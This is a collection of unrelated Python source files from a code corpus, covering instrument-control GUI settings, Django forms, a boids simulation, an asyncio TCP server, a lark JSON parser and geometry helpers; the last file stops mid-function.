ui.LaserPSAux1Voltage.setValue(config.value("LaserPS/Aux1Voltage", None, type=int))
ui.LaserPSAux2Voltage.setValue(config.value("LaserPS/Aux2Voltage", None, type=int))
ui.LaserPSAux3Voltage.setValue(config.value("LaserPS/Aux3Voltage", None, type=int))
ui.LaserPSAuxDelay.setValue(config.value("LaserPS/AuxDelay", None, type=float))
ui.LaserPSSimmerDelay.setValue(config.value("LaserPS/SimmerDelay", None, type=int))
ui.LaserPSBurstNumber.setValue(config.value("LaserPS/BurstNumber", None, type=int))
ui.LaserPSBurstSeperation.setValue(config.value("LaserPS/BurstSeparation", None, type=float))
ui.LaserPSResMainVoltage.setValue(config.value("LaserPS/ResMainVoltage", None, type=int))
ui.LaserPSResAuxVoltage.setValue(config.value("LaserPS/ResAuxVoltage", None, type=int))
ui.LaserPSMaxBurstNumber.setValue(config.value("LaserPS/MaxBurstNumber", None, type=int))
ui.LaserPSMaxBurstDuration.setValue(config.value("LaserPS/MaxBurstDuration", None, type=int))
ui.LaserPSMaxExplosionEnergy.setCurrentIndex(config.value("LaserPS/MaxExplosionEnergy", 0, type=int))
ui.LaserPSAccurChargeV.setValue(config.value("LaserPS/AccurChargeV", None, type=float))
ui.LaserPSMaxDelayFlash.setValue(config.value("LaserPS/MaxDelayFlash", None, type=int))
ui.LaserPSTriggerSimmer.setValue(config.value("LaserPS/TriggerSimmer", None, type=int))
ui.LaserPSSignalReady.setValue(config.value("LaserPS/SignalReady", None, type=int))
ui.LaserPSModeBanks.setValue(config.value("LaserPS/BankMode", None, type=int))
# Phantom1
ui.Phantom1IP.setText(config.value("Phantom1/IP", "192.168.127.12", type=str))
index = ui.Phantom1FrameSync.findText(config.value("Phantom1/FrameSync", "", type=str))
ui.Phantom1FrameSync.setCurrentIndex(index if index > 0 else 0)
index = ui.Phantom1ImageFormat.findText(config.value("Phantom1/ImageFormat", "", type=str))
ui.Phantom1ImageFormat.setCurrentIndex(index if index > 0 else 0)
# Phantom2
ui.Phantom2IP.setText(config.value("Phantom2/IP", "172.16.58.3", type=str))
index = ui.Phantom1FrameSync.findText(config.value("Phantom2/FrameSync", "", type=str))
ui.Phantom2FrameSync.setCurrentIndex(index if index > 0 else 0)
index = ui.Phantom1ImageFormat.findText(config.value("Phantom2/ImageFormat", "", type=str))
ui.Phantom2ImageFormat.setCurrentIndex(index if index > 0 else 0)
# I2PS
ui.comboBoxI2PSSelectPS.setCurrentIndex(config.value("I2PS/SelectPS", 0, type=int))
ui.I2PSIP.setText(config.value("I2PS/IP", "127.0.0.1", type=str))
ui.I2PSVoltagePPMCP.setValue(config.value("I2PS/VoltagePPMCP", 0, type=int))
ui.I2PSVoltageMCP.setValue(config.value("I2PS/VoltageMCP", 0, type=int))
ui.I2PSVoltagePCHighSide.setValue(config.value("I2PS/VoltagePCHighSide", 0, type=int))
ui.I2PSVoltagePCLowSide.setValue(config.value("I2PS/VoltagePCLowSide", 0, type=int))
ui.I2PSPulseDuration.setValue(config.value("I2PS/PulseDuration", 0, type=int))
ui.I2PSTriggerDelay.setValue(config.value("I2PS/TriggerDelay", 0, type=int))
ui.II_Coarse.setCurrentIndex(config.value("I2PS/Coarse", 0, type=int))
ui.II_Fine.setValue(config.value("I2PS/Fine", 0, type=float))
ui.II_Gain.setValue(config.value("I2PS/Gain", 0, type=float))
# Ophir
ui.OphirSerialPort.setText(config.value("Ophir/SerialPort", "COM2", type=str))
# ADC
ui.ADCRecordLength.setValue(config.value("ADC/RecordLength", 131072, type=int))
index = ui.ADCSampleRate.findText(config.value("ADC/SampleRate", "", type=str))
ui.ADCSampleRate.setCurrentIndex(index if index > 0 else 11)
index = ui.ADCInputRange.findText(config.value("ADC/InputRange", "", type=str))
ui.ADCInputRange.setCurrentIndex(index if index > 0 else 11)
ui.ADCCH1Name.setText(config.value("ADC/CH1Name", "", type=str))
ui.ADCCH2Name.setText(config.value("ADC/CH2Name", "", type=str))
ui.ADCCH1Enable.setChecked(config.value("ADC/CH1Enable", True, type=bool))
ui.ADCCH2Enable.setChecked(config.value("ADC/CH2Enable", True, type=bool))
# Scope
ui.ScopeSerialPort.setText(config.value("Scope/SerialPort", "COM3", type=str))
ui.ScopeIP.setText(config.value("Scope/IP", "10.182.5.8", type=str))
ui.ScopeCH1Name.setText(config.value("Scope/CH1Name", "", type=str))
ui.ScopeCH2Name.setText(config.value("Scope/CH2Name", "", type=str))
ui.ScopeCH3Name.setText(config.value("Scope/CH3Name", "", type=str))
ui.ScopeCH4Name.setText(config.value("Scope/CH4Name", "", type=str))
ui.ScopeCH1Enable.setChecked(config.value("Scope/CH1Enable", True, type=bool))
ui.ScopeCH2Enable.setChecked(config.value("Scope/CH2Enable", True, type=bool))
ui.ScopeCH3Enable.setChecked(config.value("Scope/CH3Enable", True, type=bool))
ui.ScopeCH4Enable.setChecked(config.value("Scope/CH4Enable", True, type=bool))
# Triggering
ui.TriggerIP.setText(config.value("Triggering/IP", "127.0.0.1", type=str))
ui.TriggerPort.setValue(config.value("Triggering/Port", "15000", type=int))
# Triggering/times
f = open(MPTS_trigger_file, 'r')
data = f.readlines()
f.close()
read_trigger_settings(data, ui)
def save_settings(config, ui):
"""Saves current UI configuration to ini file, called when exiting the main application"""
config.setValue("OperationMode", ui.comboBoxOperationMode.currentIndex())
config.setValue("CamerasFrameRate", ui.CamerasFrameRate.value())
config.setValue("CamerasExposureTime", ui.CamerasExposureTime.value())
config.setValue("ContinuouslyUpdate", ui.checkBoxContinuouslyUpdate.isChecked())
config.setValue("Operator", ui.Operator.text())
config.setValue("Email", ui.Email.text())
config.setValue("Aim", ui.Aim.text())
config.setValue("Comments", ui.Comments.toPlainText())
config.beginGroup("LaserPS")
config.setValue("SerialPort", ui.LaserPSSerialPort.text())
config.setValue("MainVoltage", ui.LaserPSMainVoltage.value())
config.setValue("Aux1Voltage", ui.LaserPSAux1Voltage.value())
config.setValue("Aux2Voltage", ui.LaserPSAux2Voltage.value())
config.setValue("Aux3Voltage", ui.LaserPSAux3Voltage.value())
config.setValue("AuxDelay", ui.LaserPSAuxDelay.value())
config.setValue("SimmerDelay", ui.LaserPSSimmerDelay.value())
config.setValue("BurstNumber", ui.LaserPSBurstNumber.value())
config.setValue("BurstSeparation", round(ui.LaserPSBurstSeperation.value(), 1))
config.setValue("ResMainVoltage", ui.LaserPSResMainVoltage.value())
config.setValue("ResAuxVoltage", ui.LaserPSResAuxVoltage.value())
config.setValue("MaxBurstNumber", ui.LaserPSMaxBurstNumber.value())
config.setValue("MaxBurstDuration", ui.LaserPSMaxBurstDuration.value())
config.setValue("MaxExplosionEnergy", ui.LaserPSMaxExplosionEnergy.currentIndex())
config.setValue("PSAccurChargeV", ui.LaserPSAccurChargeV.value())
config.setValue("MaxDelayFlash", ui.LaserPSMaxDelayFlash.value())
config.setValue("TriggerSimmer", ui.LaserPSTriggerSimmer.value())
config.setValue("SignalReady", ui.LaserPSSignalReady.value())
config.setValue("BankMode", ui.LaserPSModeBanks.value())
config.endGroup()
config.beginGroup("Phantom1")
config.setValue("IP", ui.Phantom1IP.text())
config.setValue("FrameSync", ui.Phantom1FrameSync.currentText())
config.setValue("ImageFormat", ui.Phantom1ImageFormat.currentText())
config.endGroup()
config.beginGroup("Phantom2")
config.setValue("IP", ui.Phantom2IP.text())
config.setValue("FrameSync", ui.Phantom2FrameSync.currentText())
config.setValue("ImageFormat", ui.Phantom2ImageFormat.currentText())
config.endGroup()
config.beginGroup("I2PS")
config.setValue("SelectPS", ui.comboBoxI2PSSelectPS.currentIndex())
config.setValue("IP", ui.I2PSIP.text())
config.setValue("VoltagePPMCP", ui.I2PSVoltagePPMCP.value())
config.setValue("VoltageMCP", ui.I2PSVoltageMCP.value())
config.setValue("VoltagePCHighSide", ui.I2PSVoltagePCHighSide.value())
config.setValue("VoltagePCLowSide", ui.I2PSVoltagePCLowSide.value())
config.setValue("PulseDuration", ui.I2PSPulseDuration.value())
config.setValue("TriggerDelay", ui.I2PSTriggerDelay.value())
config.setValue("Coarse", ui.II_Coarse.currentIndex())
config.setValue("Fine", ui.II_Fine.value())
config.setValue("Gain", ui.II_Gain.value())
config.endGroup()
config.beginGroup("Ophir")
config.setValue("SerialPort", ui.OphirSerialPort.text())
config.endGroup()
config.beginGroup("ADC")
config.setValue("RecordLength", ui.ADCRecordLength.value())
config.setValue("SampleRate", ui.ADCSampleRate.currentText())
config.setValue("InputRange", ui.ADCInputRange.currentText())
config.setValue("CH1Name", ui.ADCCH1Name.text())
config.setValue("CH2Name", ui.ADCCH2Name.text())
config.setValue("CH1Enable", ui.ADCCH1Enable.isChecked())
config.setValue("CH2Enable", ui.ADCCH2Enable.isChecked())
config.endGroup()
config.beginGroup("Scope")
config.setValue("SerialPort", ui.ScopeSerialPort.text())
config.setValue("IP", ui.ScopeIP.text())
config.setValue("CH1Name", ui.ScopeCH1Name.text())
config.setValue("CH2Name", ui.ScopeCH2Name.text())
config.setValue("CH3Name", ui.ScopeCH3Name.text())
config.setValue("CH4Name", ui.ScopeCH4Name.text())
config.setValue("CH1Enable", ui.ScopeCH1Enable.isChecked())
config.setValue("CH2Enable", ui.ScopeCH2Enable.isChecked())
config.setValue("CH3Enable", ui.ScopeCH3Enable.isChecked())
config.setValue("CH4Enable", ui.ScopeCH4Enable.isChecked())
config.endGroup()
config.beginGroup("Triggering")
config.setValue("IP", ui.TriggerIP.text())
config.setValue("Port", ui.TriggerPort.value())
config.endGroup()
# Triggering/times
write_trigger_settings(MPTS_trigger_file, ui)
def read_trigger_settings(data, ui):
for command in data:
match = regex.search(command)
if match.group(1) == "End_of_file":
break
widget = ui.centralwidget.findChild(QtWidgets.QSpinBox, triggering.logical_names[match.group(1)])
if widget:
widget.setValue(int(match.group(2)))
else:
widget = ui.centralwidget.findChild(QtWidgets.QCheckBox, triggering.logical_names[match.group(1)])
widget.setChecked(int(match.group(2)))
def write_trigger_settings(filename, ui):
f = open(filename, 'w')
for logical_name in triggering.physical_names:
widget = ui.centralwidget.findChild(QtWidgets.QSpinBox, logical_name)
if widget:
f.write('%s = "%s"\n' % (triggering.physical_names[logical_name], widget.value()))
else:
widget = ui.centralwidget.findChild(QtWidgets.QCheckBox, logical_name)
f.write('%s = "%s"\n' % (logical_name, int(widget.isChecked())))
f.write('End_of_file = "empty"\n')
f.close()
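# Illustrative sample of the MPTS_config.txt layout that the regex above and
# read_trigger_settings()/write_trigger_settings() expect: one physical trigger
# name per line, the value always in double quotes, terminated by the
# End_of_file marker. The names/values below are made up; the real names come
# from instruments.triggering.physical_names.
#
#   TriggerLaserDelay = "100"
#   TriggerCameraEnable = "1"
#   End_of_file = "empty"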
| StarcoderdataPython |
184661 | <filename>AC-OhmsLaw/polar.py
# This is a partial program to run interactively from the command line, e.g.
# linux: python3 -i polar.py
# win: python -i polar.py
import numpy
# Euler's Formula for Polar (magnitude, degrees) to Rectangular (x, yj) on complex plane.
def Pd2R(A, deg):
return A*( numpy.cos(numpy.deg2rad(deg)) + 1.0j*numpy.sin(numpy.deg2rad(deg)) )
# Display Polar format
def R2Pd(x):
string2return = ('{:0.3g}'.format(numpy.abs(x)) + "<" + '{:0.3g}'.format(numpy.rad2deg(numpy.angle(x))) + "deg")
return string2return
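# Worked example of an interactive session (made-up values, not from the original
# file): a 120 V source at 0 degrees driving an impedance of 50 ohm at 30 degrees.
#   >>> V = Pd2R(120, 0)
#   >>> Z = Pd2R(50, 30)
#   >>> I = V / Z            # AC Ohm's law: I = V / Z
#   >>> R2Pd(I)
#   '2.4<-30deg'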
# Display Polar format with unit
def R2PdU(x, unit):
string2return = ('{:0.3g}'.format(numpy.abs(x)) + unit + "<" + '{:0.3g}'.format(numpy.rad2deg(numpy.angle(x))) + "deg")
return string2return | StarcoderdataPython |
1768710 | <filename>Evernote_Django/evernote/forms.py
from django import forms
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.core.files.uploadedfile import InMemoryUploadedFile
from .models import *
class AddNoteForm(forms.ModelForm):
class Meta:
model = Note
fields = ('name', 'text', 'file')
widgets = {
'name': forms.TextInput(attrs={'class': 'noteTitle', 'placeholder': 'Новая заметка'}),
'text': forms.Textarea(
attrs={'class': 'noteBody', 'cols': 100, 'rows': 20, 'placeholder': 'Текст заметки'}),
}
class AddTagForm(forms.ModelForm):
class Meta:
model = Tag
fields = ('name',)
widgets = {
'name': forms.TextInput(attrs={'class': 'noteTags'}),
}
class FilterForm(forms.Form):
date = forms.DateField(widget=forms.DateInput(attrs={'type': 'date', 'class': 'filterForms'}), required=False,
label='По дате')
tag = forms.CharField(widget=forms.TextInput(attrs={'class': 'filterForms'}), max_length=45, required=False,
label='По тегу')
class LoginUserForm(AuthenticationForm):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'loginForm', 'placeholder': 'Username'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'loginForm', 'placeholder': '<PASSWORD>'}))
class Meta:
widgets = {
'username': forms.TextInput(attrs={'class': 'loginForm', 'placeholder': 'Username'}),
'password': forms.PasswordInput(attrs={'class': 'loginForm', 'placeholder': 'Username'}),
}
class RegisterUserForm(UserCreationForm):
password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': '<PASSWORD>'}))
password2 = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': 'Подтвердите пароль'}))
class Meta:
model = User
fields = ('first_name', 'last_name', 'username', '<PASSWORD>', '<PASSWORD>')
widgets = {
'first_name': forms.TextInput(attrs={'class': 'regForm', 'placeholder': 'Имя'}),
'last_name': forms.TextInput(attrs={'class': 'regForm', 'placeholder': 'Фамилия'}),
'username': forms.TextInput(attrs={'class': 'regForm', 'placeholder': 'Username'}),
'password1': forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': 'Пароль'}),
'password2': forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': 'Подтвердите пароль'}),
}
help_texts = {
'username': '',
'password1': '',
'password2': '',
}
| StarcoderdataPython |
3294533 | from pathlib import Path
import random
import numpy
from pyrr import matrix44
import moderngl
import moderngl_window
from moderngl_window.opengl.vao import VAO
class Boids(moderngl_window.WindowConfig):
"""
    An attempt to make something boid-like with GL3.3.
    Not currently working as intended, but still creates
    an interesting result.
    For this to properly work we need to split the calculations
    into several passes.
    We are doing this the O(n^2) way with the gpu using transform feedback.
    To make the data available to the vertex shader (looping through it)
    we copy the vertex buffer every frame to a texture.
    A better way in the future is to use a compute shader.
"""
title = "Boids"
resource_dir = (Path(__file__) / '../../resources').absolute()
aspect_ratio = 3440 / 1440
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
MAX_TEX_WIDTH = 8192
N = MAX_TEX_WIDTH * 1
def gen_initial_data(n, x_area=2.0, y_area=2.0):
for n in range(n):
# position
yield (random.random() - 0.5) * x_area
yield (random.random() - 0.5) * y_area
# Velocity
yield (random.random() - 0.5)
yield (random.random() - 0.5)
# Create geometry data
gen = gen_initial_data(N, x_area=self.aspect_ratio * 2 * 0.9, y_area=2.0 * 0.95)
data = numpy.fromiter(gen, count=N * 4, dtype='f4')
self.boids_buffer_1 = self.ctx.buffer(data.tobytes())
self.boids_buffer_2 = self.ctx.buffer(data=self.boids_buffer_1.read())
self.boids_vao_1 = VAO(name='boids_1', mode=moderngl.POINTS)
self.boids_vao_1.buffer(self.boids_buffer_1, '2f 2f', ['in_position', 'in_velocity'])
self.boids_vao_2 = VAO(name='boids_2', mode=moderngl.POINTS)
self.boids_vao_2.buffer(self.boids_buffer_2, '2f 2f', ['in_position', 'in_velocity'])
self.boids_texture = self.ctx.texture((MAX_TEX_WIDTH, N * 2 // MAX_TEX_WIDTH), components=2, dtype='f4')
# Programs
self.boids_render_program = self.load_program('programs/boids/boids_render.glsl')
self.boids_transform_program = self.load_program('programs/boids/boids_transform.glsl')
# Prepare for rendering
self.m_proj = matrix44.create_orthogonal_projection(
-self.aspect_ratio, self.aspect_ratio,
-1.0, 1.0,
-1.0, 1.0,
dtype='f4',
)
self.boids_render_program['m_proj'].write(self.m_proj.tobytes())
self.boids_transform_program['data'].value = 0
self.boids_transform_program['num_boids'].value = N
self.boids_transform_program['tex_width'].value = MAX_TEX_WIDTH
def render(self, time, frame_time):
self.boids_texture.use(location=0)
self.boids_transform_program['timedelta'].value = frame_time # max(frame_time, 1.0 / 60.0)
self.boids_vao_1.transform(self.boids_transform_program, self.boids_buffer_2)
self.boids_vao_2.render(self.boids_render_program)
# Swap around ..
self.boids_vao_1, self.boids_vao_2 = self.boids_vao_2, self.boids_vao_1
self.boids_buffer_1, self.boids_buffer_2 = self.boids_buffer_2, self.boids_buffer_1
        # Write vertex data into the texture so we can iterate over it in the shader
self.boids_texture.write(self.boids_buffer_1.read())
if __name__ == '__main__':
moderngl_window.run_window_config(Boids)
| StarcoderdataPython |
108198 | <gh_stars>1-10
num = int(input('Type a number between 0 and 9999: '))
u = num % 10
t = num // 10 % 10
h = num // 100 % 10
th = num // 1000 % 10
print(f'Unity: {u} \n'
f'Ten: {t} \n'
f'Hundred: {h} \n'
f'Thousand: {th}')
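# Worked example (illustrative input): for num = 4821 the floor divisions and
# remainders above give u = 1, t = 2, h = 8 and th = 4.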
| StarcoderdataPython |
1629975 | <gh_stars>10-100
# coding: utf-8
from asyncio import Protocol, get_event_loop
from config import cg_end_mark, cg_bytes_encoding
class TcpServer():
def __init__(self):
self.transports = set()
self.server = None
def register(self, transport):
self.transports.add(transport)
def unregister(self, transport):
self.transports.remove(transport)
def wrap(self, server):
self.server = server
tcpserver_singleton = TcpServer()
class TcpProtocol(Protocol):
"""
    asyncio.Protocol subclass - do not instantiate it manually.\n
    Each protocol instance is paired with exactly one transport.\n
    A new protocol (with its own matching transport) is created for every client connection.
"""
def __init__(self):
super().__init__()
self._transport = None
self.received = []
self.rev_totals = 0
self.send_totals = 0
self.state = None
def connection_made(self, transport):
self.state = "connected"
self._transport = transport
tcpserver_singleton.register(self._transport)
peername = transport.get_extra_info('peername')
print(type(peername))
print('Connection from {}'.format(peername))
def data_received(self, data):
self.received.append(data)
last_index = len(cg_end_mark)
if cg_end_mark.encode(cg_bytes_encoding) == data[-last_index:]:
complete_bdata = b"".join(self.received)
print("++++++++",len(complete_bdata),"+++++++")
from gateway import gateway_singleton
gateway_singleton.handle_tcp_request(self._transport, complete_bdata)
self.received = []
else:
print("split TCP data")
def connection_lost(self, exc):
from gateway import gateway_singleton
from utils import del_dict_item_by_value
self.state = "closed"
tcpserver_singleton.unregister(self._transport)
self._transport.close()
print("Connection lost", exc)
del_dict_item_by_value(gateway_singleton.tcp_pk_dict, self._transport)
del self
def pause_writing(self):
print(self._transport.get_write_buffer_size())
self.state = "paused"
def resume_writing(self):
print(self._transport.get_write_buffer_size())
self.state = "resumed"
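# Illustrative note (not part of the original module): a client talking to this
# protocol must terminate every logical message with cg_end_mark, e.g. roughly
#   writer.write(payload_bytes + cg_end_mark.encode(cg_bytes_encoding))
# data_received() keeps buffering partial TCP segments until that marker arrives
# and only then hands the joined bytes to the gateway.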
class TcpService():
"""
    TCP service abstraction.
"""
@staticmethod
async def create(addr):
"""
        Returns a coroutine object.
"""
loop = get_event_loop()
server = await loop.create_server(TcpProtocol, addr[0], addr[1])
tcpserver_singleton.wrap(server)
return tcpserver_singleton | StarcoderdataPython |
1713680 | <gh_stars>1-10
import lark
from lark.visitors import Transformer # pip3 install lark-parser
# EBNF
grammar = r"""
start : value
?value : "true" -> true
| "false" -> false
| "null" -> null
| array
| object
| NUMBER
| STRING
array : "[" (value ("," value)*)? "]"
object : "{" (pair ("," pair)*)? "}"
pair : STRING ":" value
%import common.ESCAPED_STRING -> STRING
%import common.SIGNED_NUMBER -> NUMBER
"""
class JSONTransformer(lark.Transformer):
def null(self, children):
return None
def false(self, children):
return False
def true(self, children):
return True
def NUMBER(self, st):
return int(st)
def STRING(self, st):
return st[1:-1]
def array(self, children):
return children
def object(self, children):
return dict(children)
def pair(self, children):
return tuple(children)
def start(self, children):
return children[0]
parser = lark.Lark(grammar)
def loads(text: str) -> object:
"""
    Loads a JSON document and returns the corresponding Python value.
"""
tree = parser.parse(text)
transformer = JSONTransformer()
tree = transformer.transform(tree)
if hasattr(tree, "pretty"):
return tree.pretty()
return tree
# Exemplos
print(loads("true"))
print(loads("false"))
print(loads("null"))
print(loads("42"))
print(loads('"Hello World"'))
print(loads("[true,false,null,[1,2,3,[]]]"))
print(loads('{"answer":[1,2,[]]}'))
| StarcoderdataPython |
1657627 | <filename>combine_files.py<gh_stars>1-10
import glob2
#######################################################################
# find all file names with a .txt extension
filenames = glob2.glob('data/political_news/fake_headlines/*.txt')
# concatenate all individual files into one file
with open("fake_headlines.txt", "w", encoding="ISO-8859-1") as f:
for file in filenames:
with open(file, encoding="ISO-8859-1") as infile:
# append 'fake' parameter at end of each line
f.write(infile.read()+"\t"+"fake"+"\n")
########################################################################
# find all file names with a .txt extension
filenames = glob2.glob('data/political_news/real_headlines/*.txt')
# concatenate all individual files into one file
with open("real_headlines.txt", "w", encoding="ISO-8859-1") as f:
for file in filenames:
with open(file, encoding="ISO-8859-1") as infile:
            # append 'real' label at the end of each line
f.write(infile.read()+"\t"+"real"+"\n")
######################################################################## | StarcoderdataPython |
3370508 | """
Functionality for declaring and cross-referencing
`Sphinx events
<https://www.sphinx-doc.org/en/master/extdev/appapi.html#sphinx-core-events>`_.
Sphinx events occur at specific points in the Sphinx build. When an event
is reached a signal is emitted with `sphinx.application.Sphinx.emit` that causes
the build to "pause" and allow any connected functionality to do the desired
processing. New functionality can be connected to an event with
`sphinx.application.Sphinx.connect` and new events can be created using
`sphinx.application.Sphinx.add_event`.
The code contained in this module was taken and adapted from the ``conf.py`` file
of `Sphinx's documentation
<https://github.com/sphinx-doc/sphinx/blob/
8653ceca0021f6ac6ff0aac6c26e2a455c6d4b21/doc/conf.py#L123-L138>`_.
.. rst:directive:: .. event:: name (signature)
A directive used for documenting Sphinx events. While this directive is not
provided by Sphinx, it is usd by Sphinx and, thus, cross-linking is provided
through the :confval:`intersphinx_mapping` configuration value with the
`sphinx.ext.intersphinx` extension.
The directive is used like...
.. code-block:: rst
.. event:: name (signature)
Event documentation.
| where ``name`` is the event name and ``signature`` represents what the
connected function's signature should look like.
.. rubric:: Example
The following example illustrates how to document the ``dummy-event`` event.
.. code-block:: rst
.. event:: dummy-event (app, node)
:param app: Instance of the Sphinx applications.
:param node: The pending node to be resolved.
This is just a dummy event for demonstration purposes.
The code renders like...
.. event:: dummy-event (app, node)
:param app: Instance of the Sphinx applications.
:param node: The pending node to be resolved.
This is just a dummy event for demonstration purposes.
.. rst:role:: event
This role is provided for easy cross-linking to an event's definition. For
example, doing ``:event:`dummy-event``` will cross-link to the
``dummy-event`` definition like :event:`dummy-event`. Or, a link to
Sphinx's ``builder-inited`` event goes like ``:event:`builder-inited``` ->
:event:`builder-inited`.
*Linking to external packages is made possible when using*
`sphinx.ext.intersphinx`.
"""
import re
from sphinx import addnodes
from sphinx.application import Sphinx
from sphinx.util.docfields import GroupedField
def parse_event(env, sig, signode):
"""
Used to set up the ``event`` directive and role for documenting Sphinx events.
Taken from the ``conf.py`` file of `Sphinx's documentation
<https://github.com/sphinx-doc/sphinx/blob/
8653ceca0021f6ac6ff0aac6c26e2a455c6d4b21/doc/conf.py#L123-L138>`_.
Parameters
----------
env : sphinx.environment.BuildEnvironment
Instance of the Sphinx's build environment.
sig : str
The "signature" given the the event directive or role. For example,
.. code-block:: rst
.. event:: foo(bar)
:event:`foo`
in the directive case ``foo(bar)`` would be the signature and in the role
case ``foo`` would be the signature.
signode : sphinx.addnodes.desc_signature
A `docutils` Node for the object signatures.
"""
event_sig_re = re.compile(r"([a-zA-Z-_]+)\s*\((.*)\)")
match = event_sig_re.match(sig)
if not match:
signode += addnodes.desc_name(sig, sig)
return sig
name, args = match.groups()
signode += addnodes.desc_name(name, name)
plist = addnodes.desc_parameterlist()
for arg in args.split(","):
arg = arg.strip()
plist += addnodes.desc_parameter(arg, arg)
signode += plist
return name
def setup(app: Sphinx) -> None:
"""
A `sphinx` ``setup()`` function setting up the :rst:dir:`event` directive
and :rst:role:`event` role.
"""
# this was taken from the sphinx conf.py file and creates the documenting
# directive `.. event::` and role `:event:` for documenting sphinx events
app.add_object_type(
directivename="event",
rolename="event",
indextemplate="pair: %s; event",
parse_node=parse_event,
doc_field_types=[
GroupedField(
"parameter",
label="Parameters",
names=("param",),
can_collapse=True,
)
],
)
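# Illustrative only -- not part of the original extension. A sketch of how another
# extension could declare and listen to the ``dummy-event`` documented above; the
# handler name and its (app, node) payload are assumptions.
def _example_dummy_event_usage(app: Sphinx) -> None:
    def on_dummy_event(app, node):
        # react to the pending node here
        return None

    app.add_event("dummy-event")
    app.connect("dummy-event", on_dummy_event)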
| StarcoderdataPython |
3261265 | <gh_stars>1-10
#!/usr/bin/env python
import asyncio
import click
from nempy.sym.network import NodeSelector
@click.command()
@click.option('-h', '--host', 'hosts', default=('google.com',), type=str, multiple=True, help='host to check latency')
@click.option('-p', '--port', default=443, help='port to check')
@click.option('-r', '--runs', default=3, help='number of latency measurements per host')
def main(hosts, port, runs):
loop = asyncio.get_event_loop()
for i, host in enumerate(hosts):
latency = loop.run_until_complete(NodeSelector.measure_latency(host=host, port=port, runs=runs))
if None in latency:
            print(f'{i+1}. {host}:{port} - --')
continue
print(f'{i+1}. {host}:{port} - {sum(latency)/runs}')
if __name__ == '__main__':
main()
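# Example invocation (illustrative host names; use whatever filename this script
# is saved under):
#   python measure_latency.py -h sym-node-1.example.com -h sym-node-2.example.com -p 3000 -r 5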
| StarcoderdataPython |
6581 | <reponame>rodlukas/UP-admin<filename>admin/migrations/0041_course_color.py
# Generated by Django 2.2.3 on 2019-07-31 13:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("admin", "0040_auto_20190718_0938")]
operations = [
migrations.AddField(
model_name="course", name="color", field=models.CharField(default="#000", max_length=7)
)
]
| StarcoderdataPython |
191262 | import numpy as np
from ccgowl.models.functions.function import Function
from ccgowl.models.functions.owl import OWL
def _get_off_diagonal_entries(x):
lt_indices = np.tril_indices_from(x, -1)
lt_indices = list(zip(*lt_indices))
return lt_indices, np.array([x[i][j] for i, j in lt_indices])
class GOWL(Function):
def eval(self, x, weights):
"""
g(X) = sum_{i=1}^p rho_i * |x|_[i]
:param x: (p x p) matrix
:param weights: weights for owl penalty
"""
nsfunc = OWL()
_, off_diagonal_entries = _get_off_diagonal_entries(x)
return nsfunc.eval(off_diagonal_entries, weights)
def gradient(self, beta, weights):
raise NotImplementedError("The OWL function is a non-smooth function. \n"
"Please call the prox function.")
def prox(self, x, weights):
"""
:param x: (p x p) matrix
:param weights: weights for owl penalty
"""
nsfunc = OWL()
lt_indices, off_diagonal_entries = _get_off_diagonal_entries(x)
prox_x = nsfunc.prox(off_diagonal_entries, weights)
for i, pair in enumerate(lt_indices):
x[pair] = prox_x[i]
return np.tril(x, -1) + np.tril(x).T
def hessian(self):
raise NotImplementedError("The OWL function is a non-smooth function. \n"
"Please call the prox function.")
| StarcoderdataPython |
3227514 | <reponame>netcadlabs/ndu-gate<gh_stars>1-10
import math
import cv2
import numpy as np
def is_inside_polygon(polygon, point):
# ref:https://stackoverflow.com/a/2922778/1266873
# int pnpoly(int nvert, float *vertx, float *verty, float testx, float testy)
# {
# int i, j, c = 0;
# for (i = 0, j = nvert-1; i < nvert; j = i++) {
# if ( ((verty[i]>testy) != (verty[j]>testy)) &&
# (testx < (vertx[j]-vertx[i]) * (testy-verty[i]) / (verty[j]-verty[i]) + vertx[i]) )
# c = !c;
# }
# return c;
# }
def pnpoly(nvert, vertx, verty, testx, testy):
i = 0
j = nvert - 1
c = False
while True:
j = i
i += 1
if i >= nvert:
break
if (verty[i] > testy) != (verty[j] > testy) and testx < (vertx[j] - vertx[i]) * (testy - verty[i]) / (
verty[j] - verty[i]) + vertx[i]:
c = not c
return c
vertx = []
verty = []
for p in polygon:
vertx.append(p[0])
verty.append(p[1])
if polygon[-1] is not polygon[0]:
p = polygon[0]
vertx.append(p[0])
verty.append(p[1])
return pnpoly(len(vertx), vertx, verty, point[0], point[1])
def is_inside_rect(rect, point):
e = 0.001
x = point[0]
if x < rect[1] - e:
return False
elif x > rect[3] + e:
return False
y = point[1]
if y < rect[0] - e:
return False
elif y > rect[2] + e:
return False
return True
def rects_intersect(rect1, rect2):
class Rectangle:
def intersects(self, other):
a, b = self, other
x1 = max(min(a.x1, a.x2), min(b.x1, b.x2))
y1 = max(min(a.y1, a.y2), min(b.y1, b.y2))
x2 = min(max(a.x1, a.x2), max(b.x1, b.x2))
y2 = min(max(a.y1, a.y2), max(b.y1, b.y2))
return x1 < x2 and y1 < y2
def _set(self, x1, y1, x2, y2):
if x1 > x2 or y1 > y2:
raise ValueError("Coordinates are invalid")
self.x1, self.y1, self.x2, self.y2 = x1, y1, x2, y2
def __init__(self, bbox):
self._set(bbox[0], bbox[1], bbox[2], bbox[3])
return Rectangle(rect1).intersects(Rectangle(rect2))
def rects_overlap(rect1, rect2, min_ratio):
w1 = rect1[2] - rect1[0]
w2 = rect2[2] - rect2[0]
w_min = min(rect1[2], rect2[2]) - max(rect1[0], rect2[0])
if (w_min / w1) >= min_ratio or (w_min / w2) >= min_ratio:
h1 = rect1[3] - rect1[1]
h2 = rect2[3] - rect2[1]
h_min = min(rect1[3], rect2[3]) - max(rect1[1], rect2[1])
return (h_min / h1) >= min_ratio or (h_min / h2) >= min_ratio
return False
def add_padding_rect(rect, padding):
x1, y1, x2, y2 = rect[0], rect[1], rect[2], rect[3]
dw = (x2 - x1) * padding
dh = (y2 - y1) * padding
return [x1 - dw, y1 - dh, x2 + dw, y2 + dh]
def distance(p1, p2):
